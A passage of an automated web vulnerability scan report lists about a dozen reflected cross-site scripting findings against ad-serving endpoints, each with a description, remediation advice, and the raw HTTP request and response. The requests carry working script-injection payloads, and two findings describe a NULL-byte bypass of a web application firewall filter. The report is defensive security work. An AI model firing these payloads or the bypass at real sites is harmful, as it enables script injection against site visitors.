Content-Type: text/html
Expires: 0
Connection: close
Date: Fri, 19 Nov 2010 23:27:07 GMT
Connection: close

<html><head><title>ATT_YTH_WP7_Quantum_Launch_728x90</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head><body style="border-width:0px
...[SNIP]...
/0/225/AdId=1257208;BnId=2;itime=207125146;kvpg=aolnews%2Fsearch;kvmn=93305196;kvtid=16e8oqe01cg8de;kr2703=40329;kvseg=99999:50085:54057:60490:50212:50220:60183:50216:50229;kp=91918;nodecode=yes;link=\e45eb'-alert(1)-'f8d3ea20e84');


}
else
{
_strContentCBR1288991745463 = '<a target="_blank" href="http://clk.atdmt.com/go/276779679/direct;wi.728;hi.90;ai.189705351;ct.1/01/" onclick="if(\'http://at.atwola.com/adlink/
...[SNIP]...

2.707. http://redcated/CNT/iview/276779681/direct [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://redcated
Path:   /CNT/iview/276779681/direct

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e6419'%3b7da57926eea was submitted in the REST URL parameter 4. This input was echoed as e6419';7da57926eea in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /CNT/iview/276779681/directe6419'%3b7da57926eea HTTP/1.1
Host: redcated
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AA002=1290036034-1562307; MUID=CEB33434C0164921BC56F0EB31A08430;

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 7126
Content-Type: text/html
Expires: 0
Connection: close
Date: Fri, 19 Nov 2010 23:27:33 GMT
Connection: close

<html><head><title>ATT_YTH_WP7_Quantum_Launch_300x250</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head><body style="border-width:0p
...[SNIP]...
m name="movie" value="HTTP://ec.atdmt.com/ds/CJCNTCINGCBR/11_5_2010_2010_Youth_Windows_Phone_7/ATT_YTH_WP7_Quantum_Launch_300x250.swf?ver=1&clickTag1=!~!click!~!http://clk.atdmt.com/go/276779681/directe6419';7da57926eea;ai.189705300;ct.1/01&clickTag=!~!click!~!http://clk.redcated/go/276779681/directe6419';7da57926eea;ai.189705300;ct.1/01" />
...[SNIP]...

2.708. http://redcated/CNT/iview/276779681/direct [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://redcated
Path:   /CNT/iview/276779681/direct

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 795c9"><script>alert(1)</script>495eb798e32 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /CNT/iview/276779681/direct;wi.300;hi.250/01/207123317?click=http://at.atwola.com/adlink/5113/1151178/0/170/AdId=1257208;BnId=3;itime=207123317;kvpg=aolnews%2Fcategory%2Fhelp%2Dand%2Dfeedback%2F;kvmn=93305231;kvtid=16e8oqe01cg8de;kr2703=40329;kvseg=99999:50085:54057:60490:50212:50220:60183:50216:50229;kp=91918;nodecode=yes;link=\&795c9"><script>alert(1)</script>495eb798e32=1 HTTP/1.1
Host: redcated
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AA002=1290036034-1562307; MUID=CEB33434C0164921BC56F0EB31A08430;

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 8658
Content-Type: text/html
Expires: 0
Connection: close
Date: Fri, 19 Nov 2010 23:27:19 GMT
Connection: close

<html><head><title>ATT_YTH_WP7_Focus_Launch_300x250</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head><body style="border-width:0px;
...[SNIP]...
me=207123317;kvpg=aolnews%2Fcategory%2Fhelp%2Dand%2Dfeedback%2F;kvmn=93305231;kvtid=16e8oqe01cg8de;kr2703=40329;kvseg=99999:50085:54057:60490:50212:50220:60183:50216:50229;kp=91918;nodecode=yes;link=\&795c9"><script>alert(1)</script>495eb798e32=1\')(new Image).src=\'http://at.atwola.com/adlink/5113/1151178/0/170/AdId=1257208;BnId=3;itime=207123317;kvpg=aolnews%2Fcategory%2Fhelp%2Dand%2Dfeedback%2F;kvmn=93305231;kvtid=16e8oqe01cg8de;kr2703=40
...[SNIP]...

2.709. http://redcated/CNT/iview/276779681/direct [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://redcated
Path:   /CNT/iview/276779681/direct

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9b0d2"-alert(1)-"6a50322d113 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /CNT/iview/276779681/direct;wi.300;hi.250/01/207123317?click=http://at.atwola.com/adlink/5113/1151178/0/170/AdId=1257208;BnId=3;itime=207123317;kvpg=aolnews%2Fcategory%2Fhelp%2Dand%2Dfeedback%2F;kvmn=93305231;kvtid=16e8oqe01cg8de;kr2703=40329;kvseg=99999:50085:54057:60490:50212:50220:60183:50216:50229;kp=91918;nodecode=yes;link=\&9b0d2"-alert(1)-"6a50322d113=1 HTTP/1.1
Host: redcated
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AA002=1290036034-1562307; MUID=CEB33434C0164921BC56F0EB31A08430;

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 8602
Content-Type: text/html
Expires: 0
Connection: close
Date: Fri, 19 Nov 2010 23:27:19 GMT
Connection: close

<html><head><title>ATT_YTH_WP7_Surround_Launch_300x250</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head><body style="border-width:0
...[SNIP]...
me=207123317;kvpg=aolnews%2Fcategory%2Fhelp%2Dand%2Dfeedback%2F;kvmn=93305231;kvtid=16e8oqe01cg8de;kr2703=40329;kvseg=99999:50085:54057:60490:50212:50220:60183:50216:50229;kp=91918;nodecode=yes;link=\&9b0d2"-alert(1)-"6a50322d113=1",
clickThruUrl: "http://clk.redcated/go/276779681/direct;wi.300;hi.250;ai.189705372;ct.$num$/01/",
imgs : []
};

if (!window.armapi_a1_a1)
{
var armapi_a1_a1 =
{
initialize : f
...[SNIP]...

2.710. http://redcated/CNT/iview/276779681/direct [wi.300;hi.250/01/207123317?click parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://redcated
Path:   /CNT/iview/276779681/direct

Issue detail

The value of the wi.300;hi.250/01/207123317?click request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 17b32'-alert(1)-'4ff808c96a5 was submitted in the wi.300;hi.250/01/207123317?click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /CNT/iview/276779681/direct;wi.300;hi.250/01/207123317?click=http://at.atwola.com/adlink/5113/1151178/0/170/AdId=1257208;BnId=3;itime=207123317;kvpg=aolnews%2Fcategory%2Fhelp%2Dand%2Dfeedback%2F;kvmn=93305231;kvtid=16e8oqe01cg8de;kr2703=40329;kvseg=99999:50085:54057:60490:50212:50220:60183:50216:50229;kp=91918;nodecode=yes;link=\17b32'-alert(1)-'4ff808c96a5 HTTP/1.1
Host: redcated
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AA002=1290036034-1562307; MUID=CEB33434C0164921BC56F0EB31A08430;

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 8583
Content-Type: text/html
Expires: 0
Connection: close
Date: Fri, 19 Nov 2010 23:27:04 GMT
Connection: close

<html><head><title>ATT_YTH_WP7_Surround_Launch_300x250</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head><body style="border-width:0
...[SNIP]...
ime=207123317;kvpg=aolnews%2Fcategory%2Fhelp%2Dand%2Dfeedback%2F;kvmn=93305231;kvtid=16e8oqe01cg8de;kr2703=40329;kvseg=99999:50085:54057:60490:50212:50220:60183:50216:50229;kp=91918;nodecode=yes;link=\17b32'-alert(1)-'4ff808c96a5');


}
else
{
_strContentCBR1288991882388 = '<a target="_blank" href="http://clk.atdmt.com/go/276779681/direct;wi.300;hi.250;ai.189705372;ct.1/01/" onclick="if(\'http://at.atwola.com/adlink
...[SNIP]...

2.711. http://redcated/CNT/iview/276779681/direct [wi.300;hi.250/01/207123317?click parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://redcated
Path:   /CNT/iview/276779681/direct

Issue detail

The value of the wi.300;hi.250/01/207123317?click request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8de87</script><script>alert(1)</script>b45688b6c2d was submitted in the wi.300;hi.250/01/207123317?click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /CNT/iview/276779681/direct;wi.300;hi.250/01/207123317?click=http://at.atwola.com/adlink/5113/1151178/0/170/AdId=1257208;BnId=3;itime=207123317;kvpg=aolnews%2Fcategory%2Fhelp%2Dand%2Dfeedback%2F;kvmn=93305231;kvtid=16e8oqe01cg8de;kr2703=40329;kvseg=99999:50085:54057:60490:50212:50220:60183:50216:50229;kp=91918;nodecode=yes;link=\8de87</script><script>alert(1)</script>b45688b6c2d HTTP/1.1
Host: redcated
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AA002=1290036034-1562307; MUID=CEB33434C0164921BC56F0EB31A08430;

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 8692
Content-Type: text/html
Expires: 0
Connection: close
Date: Fri, 19 Nov 2010 23:27:05 GMT
Connection: close

<html><head><title>ATT_YTH_WP7_Quantum_Launch_300x250</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head><body style="border-width:0p
...[SNIP]...
ime=207123317;kvpg=aolnews%2Fcategory%2Fhelp%2Dand%2Dfeedback%2F;kvmn=93305231;kvtid=16e8oqe01cg8de;kr2703=40329;kvseg=99999:50085:54057:60490:50212:50220:60183:50216:50229;kp=91918;nodecode=yes;link=\8de87</script><script>alert(1)</script>b45688b6c2d",
clickThruUrl: "http://clk.redcated/go/276779681/direct;wi.300;hi.250;ai.189705300;ct.$num$/01/",
imgs : []
};

if (!window.armapi_a1_a1)
{
var armapi_a1_a1 =
{
initialize : fun
...[SNIP]...

2.712. http://redcated/CNT/iview/276779681/direct [wi.300;hi.250/01/207127617?click parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://redcated
Path:   /CNT/iview/276779681/direct

Issue detail

The value of the wi.300;hi.250/01/207127617?click request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a64b1'-alert(1)-'37bd600ceeb was submitted in the wi.300;hi.250/01/207127617?click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /CNT/iview/276779681/direct;wi.300;hi.250/01/207127617?click=http://at.atwola.com/adlink/5113/1151178/0/170/AdId=1257208;BnId=3;itime=207127617;kvpg=aolnews%2Fsearch;kvmn=93305231;kvtid=16e8oqe01cg8de;kr2703=40329;kvseg=99999:50085:54057:60490:50212:50220:60183:50216:50229;kp=91918;nodecode=yes;link=\a64b1'-alert(1)-'37bd600ceeb HTTP/1.1
Host: redcated
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AA002=1290036034-1562307; MUID=CEB33434C0164921BC56F0EB31A08430;

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 8427
Content-Type: text/html
Expires: 0
Connection: close
Date: Fri, 19 Nov 2010 23:27:05 GMT
Connection: close

<html><head><title>ATT_YTH_WP7_Focus_Launch_300x250</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head><body style="border-width:0px;
...[SNIP]...
/0/170/AdId=1257208;BnId=3;itime=207127617;kvpg=aolnews%2Fsearch;kvmn=93305231;kvtid=16e8oqe01cg8de;kr2703=40329;kvseg=99999:50085:54057:60490:50212:50220:60183:50216:50229;kp=91918;nodecode=yes;link=\a64b1'-alert(1)-'37bd600ceeb');


}
else
{
_strContentCBR1288991339000 = '<a target="_blank" href="http://clk.atdmt.com/go/276779681/direct;wi.300;hi.250;ai.189705238;ct.1/01/" onclick="if(\'http://at.atwola.com/adlink
...[SNIP]...

2.713. http://redcated/CNT/iview/276779681/direct [wi.300;hi.250/01/207127617?click parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://redcated
Path:   /CNT/iview/276779681/direct

Issue detail

The value of the wi.300;hi.250/01/207127617?click request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e392c</script><script>alert(1)</script>fcdcb01c922 was submitted in the wi.300;hi.250/01/207127617?click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /CNT/iview/276779681/direct;wi.300;hi.250/01/207127617?click=http://at.atwola.com/adlink/5113/1151178/0/170/AdId=1257208;BnId=3;itime=207127617;kvpg=aolnews%2Fsearch;kvmn=93305231;kvtid=16e8oqe01cg8de;kr2703=40329;kvseg=99999:50085:54057:60490:50212:50220:60183:50216:50229;kp=91918;nodecode=yes;link=\e392c</script><script>alert(1)</script>fcdcb01c922 HTTP/1.1
Host: redcated
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AA002=1290036034-1562307; MUID=CEB33434C0164921BC56F0EB31A08430;

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 8545
Content-Type: text/html
Expires: 0
Connection: close
Date: Fri, 19 Nov 2010 23:27:04 GMT
Connection: close

<html><head><title>ATT_YTH_WP7_Quantum_Launch_300x250</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head><body style="border-width:0p
...[SNIP]...
/0/170/AdId=1257208;BnId=3;itime=207127617;kvpg=aolnews%2Fsearch;kvmn=93305231;kvtid=16e8oqe01cg8de;kr2703=40329;kvseg=99999:50085:54057:60490:50212:50220:60183:50216:50229;kp=91918;nodecode=yes;link=\e392c</script><script>alert(1)</script>fcdcb01c922",
clickThruUrl: "http://clk.redcated/go/276779681/direct;wi.300;hi.250;ai.189705300;ct.$num$/01/",
imgs : []
};

if (!window.armapi_a1_a1)
{
var armapi_a1_a1 =
{
initialize : fun
...[SNIP]...

2.714. http://redcated/D21/iview/164326682/direct [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://redcated
Path:   /D21/iview/164326682/direct

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 15398'%3b4c0ec5912ea was submitted in the REST URL parameter 4. This input was echoed as 15398';4c0ec5912ea in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /D21/iview/164326682/direct15398'%3b4c0ec5912ea;wi.300;hi.250/01/8450819519?click=http://bellcan.adbureau.net/accipiter/adclick/CID=0000054795554fdf00000000/vibe=1/AAMSZ=300x250/SITE=ENSYMP.NEWS/AAMGNRC1=AdManagerResponse/area=HUBPAGE/ACC_RANDOM=8450819519/pageid=5839294491/relocate= HTTP/1.1
Host: redcated
Proxy-Connection: keep-alive
Referer: http://news.sympatico.ca/Home
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MUID=484C17C84DEE440386469B4B8F7D0E08; AA002=1286756359-11647780; ach00=22ba7/1b1dd:e29b/1c5b3:bab9/597b:64b4/2333a:64b4/24dc8:d4ad/2333a:e848/2612a:15028/1588:ce69/33f2:ad0c/26c90:f08b/de5:bab9/19c18; ach01=afa5f79/1c5b3/f8171be/e29b/4cd4c6f9:9bbdd1c/1b1dd/dab7f42/22ba7/4cd63e2f:b0136d4/1c5b3/f8171d7/e29b/4cd63e89:a2fcd2a/597b/e707601/bab9/4cd64919:b321860/2333a/10166747/64b4/4cd722cf:b41888b/24dc8/101bc427/64b4/4cd7230e:b35558f/2333a/fb79481/d4ad/4cd7417c:b3c2ffb/2612a/fde9cc3/e848/4cd741de:b264760/1588/ffa42ce/15028/4cd742c8:b163c6b/33f2/fc007b8/ce69/4cd8b365:b03dda3/26c90/f2b168e/ad0c/4cdedac9:b010d10/de5/fb0ce1a/f08b/4ce29f7d:b5bd5d2/19c18/109efe4f/bab9/4ce989e6

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 7802
Content-Type: text/html
Expires: 0
Connection: close
Date: Mon, 22 Nov 2010 00:07:56 GMT

<html><head><title>F00918_Win7HGA_HDChat_300x250_EN</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head><body style="border-width:0px;
...[SNIP]...
<param name="movie" value="HTTP://spe.atdmt.com/ds/NMCAMUMCMCHP/FY11_Win7_Holiday_EN/F00918_Win7HGA_HDChat_300x250_EN.swf?ver=1&clickTag1=!~!click!~!http://clk.redcated/go/164326682/direct15398';4c0ec5912ea;wi.300;hi.250;ai.186052997.187367607.191242435;ct.1/01&clickTag=!~!click!~!http://clk.redcated/go/164326682/direct15398';4c0ec5912ea;wi.300;hi.250;ai.186052997.187367607.191242435;ct.1/01" />
...[SNIP]...

2.715. http://redcated/D21/iview/164326682/direct [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://redcated
Path:   /D21/iview/164326682/direct

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 134de"><script>alert(1)</script>239985f94c7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /D21/iview/164326682/direct;wi.300;hi.250/01/8450819519?click=http://bellcan.adbureau.net/accipiter/adclick/CID=0000054795554fdf00000000/vibe=1/AAMSZ=300x250/SITE=ENSYMP.NEWS/AAMGNRC1=AdManagerResponse/area=HUBPAGE/ACC_RANDOM=8450819519/pageid=5839294491/relocate=&134de"><script>alert(1)</script>239985f94c7=1 HTTP/1.1
Host: redcated
Proxy-Connection: keep-alive
Referer: http://news.sympatico.ca/Home
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MUID=484C17C84DEE440386469B4B8F7D0E08; AA002=1286756359-11647780; ach00=22ba7/1b1dd:e29b/1c5b3:bab9/597b:64b4/2333a:64b4/24dc8:d4ad/2333a:e848/2612a:15028/1588:ce69/33f2:ad0c/26c90:f08b/de5:bab9/19c18; ach01=afa5f79/1c5b3/f8171be/e29b/4cd4c6f9:9bbdd1c/1b1dd/dab7f42/22ba7/4cd63e2f:b0136d4/1c5b3/f8171d7/e29b/4cd63e89:a2fcd2a/597b/e707601/bab9/4cd64919:b321860/2333a/10166747/64b4/4cd722cf:b41888b/24dc8/101bc427/64b4/4cd7230e:b35558f/2333a/fb79481/d4ad/4cd7417c:b3c2ffb/2612a/fde9cc3/e848/4cd741de:b264760/1588/ffa42ce/15028/4cd742c8:b163c6b/33f2/fc007b8/ce69/4cd8b365:b03dda3/26c90/f2b168e/ad0c/4cdedac9:b010d10/de5/fb0ce1a/f08b/4ce29f7d:b5bd5d2/19c18/109efe4f/bab9/4ce989e6

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 7871
Content-Type: text/html
Expires: 0
Connection: close
Date: Mon, 22 Nov 2010 00:07:12 GMT

<html><head><title>F00918_Win7HGA_HDChat_300x250_EN</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head><body style="border-width:0px;
...[SNIP]...
tp://bellcan.adbureau.net/accipiter/adclick/CID=0000054795554fdf00000000/vibe=1/AAMSZ=300x250/SITE=ENSYMP.NEWS/AAMGNRC1=AdManagerResponse/area=HUBPAGE/ACC_RANDOM=8450819519/pageid=5839294491/relocate=&134de"><script>alert(1)</script>239985f94c7=1\')(new Image).src=\'http://bellcan.adbureau.net/accipiter/adclick/CID=0000054795554fdf00000000/vibe=1/AAMSZ=300x250/SITE=ENSYMP.NEWS/AAMGNRC1=AdManagerResponse/area=HUBPAGE/ACC_RANDOM=8450819519/pag
...[SNIP]...

2.716. http://redcated/D21/iview/164326682/direct [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://redcated
Path:   /D21/iview/164326682/direct

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ec78b"-alert(1)-"9623b87a678 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /D21/iview/164326682/direct;wi.300;hi.250/01/8450819519?click=http://bellcan.adbureau.net/accipiter/adclick/CID=0000054795554fdf00000000/vibe=1/AAMSZ=300x250/SITE=ENSYMP.NEWS/AAMGNRC1=AdManagerResponse/area=HUBPAGE/ACC_RANDOM=8450819519/pageid=5839294491/relocate=&ec78b"-alert(1)-"9623b87a678=1 HTTP/1.1
Host: redcated
Proxy-Connection: keep-alive
Referer: http://news.sympatico.ca/Home
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MUID=484C17C84DEE440386469B4B8F7D0E08; AA002=1286756359-11647780; ach00=22ba7/1b1dd:e29b/1c5b3:bab9/597b:64b4/2333a:64b4/24dc8:d4ad/2333a:e848/2612a:15028/1588:ce69/33f2:ad0c/26c90:f08b/de5:bab9/19c18; ach01=afa5f79/1c5b3/f8171be/e29b/4cd4c6f9:9bbdd1c/1b1dd/dab7f42/22ba7/4cd63e2f:b0136d4/1c5b3/f8171d7/e29b/4cd63e89:a2fcd2a/597b/e707601/bab9/4cd64919:b321860/2333a/10166747/64b4/4cd722cf:b41888b/24dc8/101bc427/64b4/4cd7230e:b35558f/2333a/fb79481/d4ad/4cd7417c:b3c2ffb/2612a/fde9cc3/e848/4cd741de:b264760/1588/ffa42ce/15028/4cd742c8:b163c6b/33f2/fc007b8/ce69/4cd8b365:b03dda3/26c90/f2b168e/ad0c/4cdedac9:b010d10/de5/fb0ce1a/f08b/4ce29f7d:b5bd5d2/19c18/109efe4f/bab9/4ce989e6

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 2405
Content-Type: text/html
Expires: 0
Connection: close
Date: Mon, 22 Nov 2010 00:07:17 GMT

<SCRIPT Language="Javascript">
var MPcode = "12308-114935-6552-2";
var MPwidth = "300";
var MPheight = "250";
var randNum = Math.floor(Math.random() * 10000000);
var iframesrc = "http://altfarm.m
...[SNIP]...
tp://bellcan.adbureau.net/accipiter/adclick/CID=0000054795554fdf00000000/vibe=1/AAMSZ=300x250/SITE=ENSYMP.NEWS/AAMGNRC1=AdManagerResponse/area=HUBPAGE/ACC_RANDOM=8450819519/pageid=5839294491/relocate=&ec78b"-alert(1)-"9623b87a678=1http://clk.redcated/go/164326682/direct;wi.300;hi.250;ai.191230432.191819755;ct.1/01?href= width=" + MPwidth + " height=" + MPheight + " marginwidth=0 marginheight=0 hspace=0 vspace=0 frameborder=0
...[SNIP]...

2.717. http://redcated/D21/iview/164326682/direct [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://redcated
Path:   /D21/iview/164326682/direct

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload %00d8afa'-alert(1)-'eebb67c14ef was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d8afa'-alert(1)-'eebb67c14ef in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /D21/iview/164326682/direct;wi.300;hi.250/01/8450819519?click=http://bellcan.adbureau.net/accipiter/adclick/CID=0000054795554fdf00000000/vibe=1/AAMSZ=300x250/SITE=ENSYMP.NEWS/AAMGNRC1=AdManagerResponse/area=HUBPAGE/ACC_RANDOM=8450819519/pageid=5839294491/relocate=&%00d8afa'-alert(1)-'eebb67c14ef=1 HTTP/1.1
Host: redcated
Proxy-Connection: keep-alive
Referer: http://news.sympatico.ca/Home
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
